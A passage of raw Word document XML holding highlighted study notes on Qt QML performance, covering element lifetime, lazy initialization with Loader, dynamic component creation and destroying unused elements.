          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="002069E3" w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>прыгадаць, як гэта робіцца</w:t>
      </w:r>
      <w:r w:rsidR="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</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See the</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId659" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Particle System Performance Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more in-depth information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="983" w:name="controlling-element-lifetime"/>
      <w:bookmarkStart w:id="984" w:name="_Toc483000738"/>
      <w:bookmarkStart w:id="985" w:name="_Toc483003750"/>
      <w:bookmarkStart w:id="986" w:name="_Toc483604090"/>
      <w:bookmarkStart w:id="987" w:name="_Toc483605310"/>
      <w:bookmarkEnd w:id="983"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Controlling Element Lifetime</w:t>
      </w:r>
      <w:bookmarkEnd w:id="984"/>
      <w:bookmarkEnd w:id="985"/>
      <w:bookmarkEnd w:id="986"/>
      <w:bookmarkEnd w:id="987"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00CB2AF2" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB2AF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>partitioning an application into simple, modular components, each contained in a single QML file, you can achieve faster application startup time and better control over memory usage, and reduce the number of active-but-invisible elements in your application</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="988" w:name="lazy-initialization"/>
      <w:bookmarkStart w:id="989" w:name="_Toc483000739"/>
      <w:bookmarkStart w:id="990" w:name="_Toc483003751"/>
      <w:bookmarkStart w:id="991" w:name="_Toc483604091"/>
      <w:bookmarkStart w:id="992" w:name="_Toc483605311"/>
      <w:bookmarkEnd w:id="988"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lazy Initialization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="989"/>
      <w:bookmarkEnd w:id="990"/>
      <w:bookmarkEnd w:id="991"/>
      <w:bookmarkEnd w:id="992"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="006168FD" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML engine does some tricky things to try to ensure that loading and initialization of components doesn't cause frames to be skipped</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>However, there is no better way to reduce startup time than to avoid doing work you don't need to do, and delaying the work until it is necessary</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This may be achieved by using either</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId660" w:history="1">
        <w:r w:rsidRPr="006168FD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Loader</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>creating components</w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId661" w:history="1">
        <w:r w:rsidRPr="006168FD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>dynamically</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="993" w:name="using-loader"/>
      <w:bookmarkStart w:id="994" w:name="_Toc483000740"/>
      <w:bookmarkStart w:id="995" w:name="_Toc483604092"/>
      <w:bookmarkStart w:id="996" w:name="_Toc483605312"/>
      <w:bookmarkEnd w:id="993"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Loader</w:t>
      </w:r>
      <w:bookmarkEnd w:id="994"/>
      <w:bookmarkEnd w:id="995"/>
      <w:bookmarkEnd w:id="996"/>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The Loader is an element which </w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows dynamic loading and unloading of components</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the "</w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>active</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" property of a Loader, initialization can be delayed until required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using the overloaded version of the "</w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setSource</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()" function, initial property values can be supplied.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Setting the Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId662" w:anchor="asynchronous-prop" w:history="1">
        <w:r w:rsidRPr="006168FD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>asynchronous</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to true may also improve fluidity while a component is instantiated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="002069E3">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="997" w:name="using-dynamic-creation"/>
      <w:bookmarkStart w:id="998" w:name="_Toc483000741"/>
      <w:bookmarkStart w:id="999" w:name="_Toc483604093"/>
      <w:bookmarkStart w:id="1000" w:name="_Toc483605313"/>
      <w:bookmarkEnd w:id="997"/>
      <w:r w:rsidRPr="002069E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Using Dynamic Creation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="998"/>
      <w:bookmarkEnd w:id="999"/>
      <w:bookmarkEnd w:id="1000"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00C97C4A" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Developers can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="006168FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.createComponent()</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to create a component dynamically at runtime from within </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then call </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>createObject</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">() to instantiate it. Depending on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C4A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ownership semantics specified in the call, the developer may have to delete the created object manually</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId663" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Dynamic QML Object Creation from JavaScript</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00907C71">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1001" w:name="destroy-unused-elements"/>
      <w:bookmarkStart w:id="1002" w:name="_Toc483000742"/>
      <w:bookmarkStart w:id="1003" w:name="_Toc483003752"/>
      <w:bookmarkStart w:id="1004" w:name="_Toc483604094"/>
      <w:bookmarkStart w:id="1005" w:name="_Toc483605314"/>
      <w:bookmarkEnd w:id="1001"/>
      <w:r w:rsidRPr="00907C71">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Destroy Unused Elements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1002"/>
      <w:bookmarkEnd w:id="1003"/>
      <w:bookmarkEnd w:id="1004"/>
      <w:bookmarkEnd w:id="1005"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00907C71" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Elements which are invisible because they are a child of a non-visible element</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the second tab in a tab-widget, while the first tab is shown) </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC5A42">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
